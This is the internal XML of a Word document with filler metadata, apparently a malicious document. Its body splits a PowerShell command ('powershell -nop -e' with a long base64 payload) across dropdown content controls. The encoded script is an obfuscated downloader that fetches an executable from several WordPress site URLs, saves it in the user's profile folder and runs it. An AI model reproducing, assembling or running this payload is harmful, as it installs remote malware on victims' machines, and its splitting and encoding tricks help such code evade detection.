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AEEA"/>
  <w:body>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:dropDownList/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:t xml:space="preserve">ell -nop -e </w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:dropDownList/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:t>powersh</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:dropDownList/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:t>JABGAFUAVwAwAFEAUAB1AD0AJwBGAE4AbQBzADcAcgAnADsAJABqAFgAdwBaAEYARAAgAD0AIAAnADYAOAAyACcAOwAkAHoAdQBRAGkAegBZAG4AbwA9ACcATQBFAHQAMABpAEEAVAAnADsAJABtAFUASgBDAHMAbwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAagBYAHcAWgBGAEQAKwAnAC4AZQB4AGUAJwA7ACQAQgB2AGYAbABtADMAPQAnAFcAaQBzAHEASABZAE4AJwA7ACQAUwBqAEYAQgA1AHUAPQAmACgAJwBuACcAKwAnAGUAdwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQB0AGAALgBXAEUAYgBjAEwASQBgAEUATgBUADsAJABiAGYAQgBwADEAYQBfAD0AJwBoAHQAdABwADoALwAvAGMAbwBuAHQAZQBzAHQAYwBvAHIAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBmADgALwBAAGgAdAB0AHAAOgAvAC8AYgBpAHoAcgBpAGQAZQByAHQAcgBpAHAALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGoANQAwADQALwBAAGgAdAB0AHAAOgAvAC8AYgBsAG8AZwAuAGsAYQAtAHAAbwBrAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB2ADIAMAAxADYALwBAAGgAdAB0AHAAOgAvAC8AYgBhAGgAYQByAHMAZQBuAGQAaQBuAGMALgBjAG8AbQAvAHYAMgBvAHMALwBkAGMANQA0ADAAMwA1AC8AQABoAHQAdABwADoALwAvAGIAbwB6AGgAYQBjAG8AZgBmAGUAZQAuAGMAbwBtAC8AZQBuAC8AMAA3ADIALwAnAC4AcwBwAEwAaQBUACgAJwBAACcAKQA7ACQAUQBtAGkAMABXAG0AYwBIAD0AJwBUAFAASAByAG4ASQAnADsAZgBvAHIAZQBhAGMAaAAoACQAcQBDADYAbABhADQAWgAgAGkAbgAgACQAYgBmAEIAcAAxAGEAXwApAHsAdAByAHkAewAkAFMAagBGAEIANQB1AC4AZABvAFcAbgBMAG8AYQBEAGYASQBMAEUAKAAkAHEAQwA2AGwAYQA0AFoALAAgACQAbQBVAEoAQwBzAG8AKQA7ACQARwBpAEoAcABuAEwAOQBNAD0AJwB3AEkAcQBqADUAdwAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAG0AVQBKAEMAcwBvACkALgBMAEUATgBnAHQAaAAgAC0AZwBlACAAMwAzADgANAA2ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBzAFQAQQBSAFQAKAAkAG0AVQBKAEMAcwBvACkAOwAkAEQAcQBJAEMAZABTAHYATgA9ACcAcABFAGkAaQBaAEYAJwA7AGIAcgBlAGEAawA7ACQAaQBfAFgAQgBKAGMAWAA9ACcAVwAzAFYAVQBfADcAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUAAwAGMAcgBXADMAOQA9ACcAUwBBAFoAbwBRAGIAVABRACcA</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5946140" cy="2051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9:12:00Z</dcterms:created>
  <dc:creator>Kip Ledner</dc:creator>
  <dc:description>Pass Concrete</dc:description>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-29T19:12:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject>Chief</dc:subject>
  <dc:title>Developer</dc:title>
</cp:coreProperties>
</file>